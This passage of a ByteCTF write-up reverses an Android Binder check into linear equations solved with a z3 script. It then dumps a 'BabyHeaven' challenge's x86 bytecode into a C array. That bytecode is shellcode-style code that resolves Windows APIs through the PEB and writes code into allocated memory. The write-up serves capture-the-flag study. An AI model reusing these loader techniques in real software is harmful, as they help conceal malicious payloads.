switch (code) {
case IBinder.INTERFACE_TRANSACTION:
reply.writeString(IByteCTFService.DESCRIPTOR);
return true;
default:
switch (code) {
case 1:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x1(data.readInt());
reply.writeNoException();
return true;
case 2:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x2(data.readInt());
reply.writeNoException();
return true;
case 3:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x3(data.readInt());
reply.writeNoException();
return true;
case 4:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x4(data.readInt());
reply.writeNoException();
return true;
case 5:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x5(data.readInt());
reply.writeNoException();
return true;
case 6:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x6(data.readInt());
reply.writeNoException();
return true;
case 7:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x7(data.readInt());
reply.writeNoException();
return true;
case 8:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x8(data.readInt());
reply.writeNoException();
return true;
case 9:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x9(data.readInt());
reply.writeNoException();
return true;
case 10:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x10(data.readInt());
reply.writeNoException();
return true;
case 11:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x11(data.readInt());
reply.writeNoException();
return true;
case 12:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x12(data.readInt());
reply.writeNoException();
return true;
case 13:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x13(data.readInt());
reply.writeNoException();
return true;
case 14:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x14(data.readInt());
reply.writeNoException();
return true;
case 15:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x15(data.readInt());
reply.writeNoException();
return true;
case 16:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
x16(data.readInt());
reply.writeNoException();
return true;
case 17:
data.enforceInterface(IByteCTFService.DESCRIPTOR);
boolean check = check();
reply.writeNoException();
reply.writeInt(check ? 1 : 0);
return true;
default:
return super.onTransact(code, data, reply, flags);
}
}
}分析1-16对应的x系列函数会发现其实就是初始化函数
而code为17对应的就是最终的check函数,跟到check函数会发现调用了check1-16函数,必须check1-16所有函数返回值都为true才能check成功,而每一个check函数一看又是一堆apply,放弃了分析内容,拷贝到Java工程中跑一跑吧。
又是一番波折,好不容易跑起来了,大概输入了几个x1-x16值测试了下,发现实际上就是一个多元一次方程,很容易想到z3约束求解,那么如何得到方程的参数呢?
将每个check1-16函数返回值类型修改为计算的结果而不是比较的结果,修改后的check函数将比较过程放到了最终的check函数中。
这里我用控制变量法发现,当控制x0-x16中任意一个变量变化,其他15个变量固定时,会发现每个check函数在其中一个变量增加1时,其计算出来的值也会相应的发生变化,且差值一定,且每个check函数应该是有一个初值。
以一元一次方程的通式aX+b = c为例,那么相应的差值就应该是相应x1-x16的系数a,初始值就是b,最终对比的结果就是c。
按照找出的规律结合z3进行求解,得到最终的exp:
from z3 import *
init = [717, 789, 846, 686, 977, 681, 911, 774,
902, 1035, 848, 711, 802, 810, 973, 757]
sub = [
[87, 92, 18, 55, 21, 93, 27, 19, 82, 60, 77, 24, 13, 88, 78, 69, ],
[65, 15, 77, 14, 74, 63, 46, 19, 1, 72, 48, 79, 70, 24, 81, 6, ],
[67, 33, 33, 22, 38, 68, 70, 16, 66, 11, 5, 23, 81, 66, 1, 60, ],
[83, 71, 96, 6, 67, 4, 11, 88, 53, 91, 1, 7, 66, 42, 23, 84, ],
[53, 32, 79, 44, 41, 7, 2, 73, 39, 5, 2, 7, 12, 91, 29, 47, ],
[26, 15, 35, 84, 84, 61, 68, 56, 69, 57, 91, 26, 78, 3, 30, 30, ],
[12, 72, 92, 32, 78, 26, 43, 34, 62, 7, 26, 37, 42, 51, 2, 72, ],
[33, 55, 66, 79, 84, 40, 54, 7, 32, 11, 36, 66, 89, 57, 72, 65, ],
[19, 81, 87, 78, 77, 64, 78, 26, 74, 33, 29, 37, 15, 43, 27, 40, ],
[10, 40, 6, 19, 35, 73, 27, 13, 10, 70, 93, 97, 47, 79, 86, 95, ],
[71, 5, 93, 11, 4, 52, 75, 76, 83, 50, 18, 27, 20, 17, 30, 64, ],
[16, 81, 53, 84, 95, 56, 92, 49, 29, 65, 37, 50, 15, 36, 66, 50, ],
[42, 14, 42, 41, 84, 45, 11, 7, 30, 66, 62, 15, 96, 94, 31, 58, ],
[55, 41, 82, 43, 71, 44, 15, 8, 5, 60, 40, 80, 90, 25, 75, 6, ],
[60, 35, 33, 90, 61, 12, 21, 100, 94, 74, 15, 46, 92, 48, 53, 66, ],
[65, 29, 74, 52, 8, 64, 75, 13, 11, 6, 87, 49, 79, 44, 77, 84, ]
]
# 右边等式
equal = [67099, 55163, 47068,
61311, 48233, 62631, 56441, 64310, 67996, 54361, 55525, 71867, 49587,
55422, 68978, 61502]
if __name__ == '__main__':
from z3 import *
s = Solver()
flag = [BitVec('flag[%d]' % i,8) for i in range(16)]
for i in range(16):
temp = init[i]
for j in range(16):
temp += sub[i][j]*flag[j]
s.add(equal[i] == temp)
print(s.check())
print(s.model())
result = ""
for i in range(16):
result += chr(s.model()[flag[i]].as_long() & 127) # 这里一定要与127相与,这是因为java的byte和python占位不一致;Java byte 数据类型是8位、有符号的;
print("flag => ByteCTF{%s}" % result)最终得到flag :
BabyHeaven
文件是一个函数的字节码,先用python提取成字符串形式然后放到自己的c文件中编译。
with open('BabyHeaven','rb+') as f:
s = f.read()
for c in s:
print('\\x'+hex(c)[2:],end='')#include <stdio.h>
#include <Windows.h>
unsigned char function[] = "\x81\xec\xb4\x1\x0\x0\x66\xc7\x85\x4c\xff\xff\xff\x6b\x0\x66\xc7\x85\x4e\xff\xff\xff\x65\x0\x66\xc7\x85\x50\xff\xff\xff\x72\x0\x66\xc7\x85\x52\xff\xff\xff\x6e\x0\x66\xc7\x85\x54\xff\xff\xff\x65\x0\x66\xc7\x85\x56\xff\xff\xff\x6c\x0\x66\xc7\x85\x58\xff\xff\xff\x33\x0\x66\xc7\x85\x5a\xff\xff\xff\x32\x0\x66\xc7\x85\x5c\xff\xff\xff\x2e\x0\x66\xc7\x85\x5e\xff\xff\xff\x64\x0\x66\xc7\x85\x60\xff\xff\xff\x6c\x0\x66\xc7\x85\x62\xff\xff\xff\x6c\x0\x66\xc7\x85\x64\xff\xff\xff\x0\x0\xc6\x85\x3d\xff\xff\xff\x47\xc6\x85\x3e\xff\xff\xff\x65\xc6\x85\x3f\xff\xff\xff\x74\xc6\x85\x40\xff\xff\xff\x50\xc6\x85\x41\xff\xff\xff\x72\xc6\x85\x42\xff\xff\xff\x6f\xc6\x85\x43\xff\xff\xff\x63\xc6\x85\x44\xff\xff\xff\x41\xc6\x85\x45\xff\xff\xff\x64\xc6\x85\x46\xff\xff\xff\x64\xc6\x85\x47\xff\xff\xff\x72\xc6\x85\x48\xff\xff\xff\x65\xc6\x85\x49\xff\xff\xff\x73\xc6\x85\x4a\xff\xff\xff\x73\xc6\x85\x4b\xff\xff\xff\x0\xc6\x85\x30\xff\xff\xff\x4c\xc6\x85\x31\xff\xff\xff\x6f\xc6\x85\x32\xff\xff\xff\x61\xc6\x85\x33\xff\xff\xff\x64\xc6\x85\x34\xff\xff\xff\x4c\xc6\x85\x35\xff\xff\xff\x69\xc6\x85\x36\xff\xff\xff\x62\xc6\x85\x37\xff\xff\xff\x72\xc6\x85\x38\xff\xff\xff\x61\xc6\x85\x39\xff\xff\xff\x72\xc6\x85\x3a\xff\xff\xff\x79\xc6\x85\x3b\xff\xff\xff\x41\xc6\x85\x3c\xff\xff\xff\x0\xc6\x85\x22\xff\xff\xff\x47\xc6\x85\x23\xff\xff\xff\x65\xc6\x85\x24\xff\xff\xff\x74\xc6\x85\x25\xff\xff\xff\x53\xc6\x85\x26\xff\xff\xff\x79\xc6\x85\x27\xff\xff\xff\x73\xc6\x85\x28\xff\xff\xff\x74\xc6\x85\x29\xff\xff\xff\x65\xc6\x85\x2a\xff\xff\xff\x6d\xc6\x85\x2b\xff\xff\xff\x49\xc6\x85\x2c\xff\xff\xff\x6e\xc6\x85\x2d\xff\xff\xff\x66\xc6\x85\x2e\xff\xff\xff\x6f\xc6\x85\x2f\xff\xff\xff\x0\xc6\x85\x15\xff\xff\xff\x56\xc6\x85\x16\xff\xff\xff\x69\xc6\x85\x17\xff\xff\xff\x72\xc6\x85\x18\xff\xff\xff\x74\xc6\x85\x19\xff\xff\xff\x75\xc6\x85\x1a\xff\xff\xff\x61\xc6\x85\x1b\xff\xff\xff\x6c\xc6\x85\x1c\xff\xff\xff\x41\xc6\x85\x1d\xff\xff\xff\x6c\xc6\x85\x1e\xff\xff\xff\x6c\xc6\x85\x1f\xff\xff\xff\x6f\xc6\x85\x20\xff\xff\xff\x63\xc6\x85\x21\xff\xff\xff\x0\xc6\x85\x6\xff\xff\xff\x56\xc6\x85\x7\xff\xff\xff\x69\xc6\x85\x8\xff\xff\xff\x72\xc6\x85\x9\xff\xff\xff\x74\xc6\x85\xa\xff\xff\xff\x75\xc6\x85\xb\xff\xff\xff\x61\xc6\x85\xc\xff\xff\xff\x6c\xc6\x85\xd\xff\xff\xff\x50\xc6\x85\xe\xff\xff\xff\x72\xc6\x85\xf\xff\xff\xff\x6f\xc6\x85\x10\xff\xff\xff\x74\xc6\x85\x11\xff\xff\xff\x65\xc6\x85\x12\xff\xff\xff\x63\xc6\x85\x13\xff\xff\xff\x74\xc6\x85\x14\xff\xff\xff\x0\xc6\x85\xfa\xfe\xff\xff\x45\xc6\x85\xfb\xfe\xff\xff\x78\xc6\x85\xfc\xfe\xff\xff\x69\xc6\x85\xfd\xfe\xff\xff\x74\xc6\x85\xfe\xfe\xff\xff\x50\xc6\x85\xff\xfe\xff\xff\x72\xc6\x85\x0\xff\xff\xff\x6f\xc6\x85\x1\xff\xff\xff\x63\xc6\x85\x2\xff\xff\xff\x65\xc6\x85\x3\xff\xff\xff\x73\xc6\x85\x4\xff\xff\xff\x73\xc6\x85\x5\xff\xff\xff\x0\xc6\x85\xe9\xfe\xff\xff\x47\xc6\x85\xea\xfe\xff\xff\x65\xc6\x85\xeb\xfe\xff\xff\x74\xc6\x85\xec\xfe\xff\xff\x4d\xc6\x85\xed\xfe\xff\xff\x6f\xc6\x85\xee\xfe\xff\xff\x64\xc6\x85\xef\xfe\xff\xff\x75\xc6\x85\xf0\xfe\xff\xff\x6c\xc6\x85\xf1\xfe\xff\xff\x65\xc6\x85\xf2\xfe\xff\xff\x48\xc6\x85\xf3\xfe\xff\xff\x61\xc6\x85\xf4\xfe\xff\xff\x6e\xc6\x85\xf5\xfe\xff\xff\x64\xc6\x85\xf6\xfe\xff\xff\x6c\xc6\x85\xf7\xfe\xff\xff\x65\xc6\x85\xf8\xfe\xff\xff\x57\xc6\x85\xf9\xfe\xff\xff\x0\xc6\x85\xd9\xfe\xff\xff\x55\xc6\x85\xda\xfe\xff\xff\x6e\xc6\x85\xdb\xfe\xff\xff\x6d\xc6\x85\xdc\xfe\xff\xff\x61\xc6\x85\xdd\xfe\xff\xff\x70\xc6\x85\xde\xfe\xff\xff\x56\xc6\x85\xdf\xfe\xff\xff\x69\xc6\x85\xe0\xfe\xff\xff\x65\xc6\x85\xe1\xfe\xff\xff\x77\xc6\x85\xe2\xfe\xff\xff\x4f\xc6\x85\xe3\xfe\xff\xff\x66\xc6\x85\xe4\xfe\xff\xff\x46\xc6\x85\xe5\xfe\xff\xff\x69\xc6\x85\xe6\xfe\xff\xff\x6c\xc6\x85\xe7\xfe\xff\xff\x65\xc6\x85\xe8\xfe\xff\xff\x0\xc6\x85\xce\xfe\xff\xff\x75\xc6\x85\xcf\xfe\xff\xff\x73\xc6\x85\xd0\xfe\xff\xff\x65\xc6\x85\xd1\xfe\xff\xff\x72\xc6\x85\xd2\xfe\xff\xff\x33\xc6\x85\xd3\xfe\xff\xff\x32\xc6\x85\xd4\xfe\xff\xff\x2e\xc6\x85\xd5\xfe\xff\xff\x64\xc6\x85\xd6\xfe\xff\xff\x6c\xc6\x85\xd7\xfe\xff\xff\x6c\xc6\x85\xd8\xfe\xff\xff\x0\xc6\x85\xc2\xfe\xff\xff\x4d\xc6\x85\xc3\xfe\xff\xff\x65\xc6\x85\xc4\xfe\xff\xff\x73\xc6\x85\xc5\xfe\xff\xff\x73\xc6\x85\xc6\xfe\xff\xff\x61\xc6\x85\xc7\xfe\xff\xff\x67\xc6\x85\xc8\xfe\xff\xff\x65\xc6\x85\xc9\xfe\xff\xff\x42\xc6\x85\xca\xfe\xff\xff\x6f\xc6\x85\xcb\xfe\xff\xff\x78\xc6\x85\xcc\xfe\xff\xff\x41\xc6\x85\xcd\xfe\xff\xff\x0\x8d\x85\x4c\xff\xff\xff\x89\x45\x90\xc7\x45\x8c\x0\x0\x0\x0\x64\xa1\x30\x0\x0\x0\x89\x45\x8c\x8b\x45\x8c\x8b\x40\xc\x89\x45\x88\x8b\x45\x88\x83\xc0\x14\x89\x45\x84\x8b\x45\x84\x8b\x0\x89\x45\x80\xe9\xe4\x0\x0\x0\x8b\x45\x80\x83\xe8\x8\x89\x85\x7c\xff\xff\xff\x8b\x85\x7c\xff\xff\xff\x8b\x40\x30\x89\x85\x78\xff\xff\xff\x8b\x45\x90\x89\x85\x74\xff\xff\xff\x8b\x85\x78\xff\xff\xff\x89\x85\x70\xff\xff\xff\x8b\x85\x74\xff\xff\xff\x89\x85\x6c\xff\xff\xff\x8b\x85\x70\xff\xff\xff\x89\x85\x68\xff\xff\xff\xeb\x63\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x83\xf8\x40\x76\x1d\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x83\xf8\x5a\x77\xe\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x83\xc0\x20\xeb\x9\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x89\x85\x66\xff\xff\xff\x8b\x85\x6c\xff\xff\xff\xf\xb7\x0\x66\x39\x85\x66\xff\xff\xff\x74\x7\xb8\x0\x0\x0\x0\xeb\x2e\x83\x85\x6c\xff\xff\xff\x2\x83\x85\x68\xff\xff\xff\x2\x8b\x85\x68\xff\xff\xff\xf\xb7\x0\x66\x85\xc0\x75\x8f\x8b\x85\x6c\xff\xff\xff\xf\xb7\x0\x66\x85\xc0\xf\x94\xc0\xf\xb6\xc0\x85\xc0\x74\xb\x8b\x85\x7c\xff\xff\xff\x8b\x40\x18\xeb\x19\x8b\x45\x80\x8b\x0\x89\x45\x80\x8b\x45\x84\x3b\x45\x80\xf\x85\x10\xff\xff\xff\xb8\x0\x0\x0\x0\x89\x45\xf4\x8b\x45\xf4\x89\x45\xc4\x8d\x85\x3d\xff\xff\xff\x89\x45\xc0\x8b\x45\xc4\x89\x45\xbc\x8b\x45\xbc\x8b\x40\x3c\x89\xc2\x8b\x45\xbc\x1\xd0\x89\x45\xb8\x8b\x45\xb8\x8b\x50\x78\x8b\x45\xc4\x1\xd0\x89\x45\xb4\x8b\x45\xb4\x8b\x50\x20\x8b\x45\xc4\x1\xd0\x89\x45\xb0\x8b\x45\xb4\x8b\x50\x1c\x8b\x45\xc4\x1\xd0\x89\x45\xac\x8b\x45\xb4\x8b\x50\x24\x8b\x45\xc4\x1\xd0\x89\x45\xa8\xc7\x45\xa4\x0\x0\x0\x0\xe9\x91\x0\x0\x0\x8b\x45\xa4\x8d\x14\x85\x0\x0\x0\x0\x8b\x45\xb0\x1\xd0\x8b\x10\x8b\x45\xc4\x1\xd0\x89\x45\xa0\x8b\x45\xa4\x8d\x14\x0\x8b\x45\xa8\x1\xd0\xf\xb7\x0\xf\xb7\xc0\x8d\x14\x85\x0\x0\x0\x0\x8b\x45\xac\x1\xd0\x8b\x0\x89\x45\x9c\x8b\x45\xc0\x89\x45\x98\x8b\x45\xa0\x89\x45\x94\xeb\x8\x83\x45\x98\x1\x83\x45\x94\x1\x8b\x45\x94\xf\xb6\x10\x8b\x45\x98\xf\xb6\x0\x38\xc2\x75\xa\x8b\x45\x94\xf\xb6\x0\x84\xc0\x75\xde\x8b\x45\x98\xf\xb6\x10\x8b\x45\x94\xf\xb6\x0\x38\xc2\xf\x94\xc0\xf\xb6\xc0\x85\xc0\x74\xa\x8b\x55\xc4\x8b\x45\x9c\x1\xd0\xeb\x1a\x83\x45\xa4\x1\x8b\x45\xb4\x8b\x50\x14\x8b\x45\xa4\x39\xc2\xf\x87\x5e\xff\xff\xff\xb8\x0\x0\x0\x0\x89\x45\xf0\x8d\x85\x30\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xec\x8d\x85\x22\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe8\x8d\x85\x15\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe4\x8d\x85\x6\xff\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xe0\x8d\x85\xfa\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xbc\xfe\xff\xff\x8d\x85\xe9\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x45\xdc\x8d\x85\xd9\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xf4\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xb8\xfe\xff\xff\x8d\x85\xce\xfe\xff\xff\x89\x4\x24\x8b\x45\xec\xff\xd0\x83\xec\x4\x89\x45\xd8\x8d\x85\xc2\xfe\xff\xff\x89\x44\x24\x4\x8b\x45\xd8\x89\x4\x24\x8b\x45\xf0\xff\xd0\x83\xec\x8\x89\x85\xb4\xfe\xff\xff\xc7\x4\x24\x0\x0\x0\x0\x8b\x45\xdc\xff\xd0\x83\xec\x4\x89\x45\xd4\x8d\x85\x90\xfe\xff\xff\x89\x4\x24\x8b\x45\xe8\xff\xd0\x83\xec\x4\x8b\x85\x94\xfe\xff\xff\x89\x45\xd0\xc7\x44\x24\xc\x4\x0\x0\x0\xc7\x44\x24\x8\x0\x10\x0\x0\x8b\x45\xd0\x89\x44\x24\x4\xc7\x4\x24\x0\x0\x0\x0\x8b\x45\xe4\xff\xd0\x83\xec\x10\x89\x45\xcc\x8b\x45\xcc\x89\x85\x8c\xfe\xff\xff\x8b\x45\xcc\xc6\x0\x6a\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x33\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xec\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\x89\x45\xc8\x81\x45\xcc\x0\x1\x0\x0\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x57\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xec\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xab\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x64\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x12\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x68\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x74\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x78\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x15\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x84\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x14\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x88\x83\x45\xcc\x1\x8b\x45\xcc\x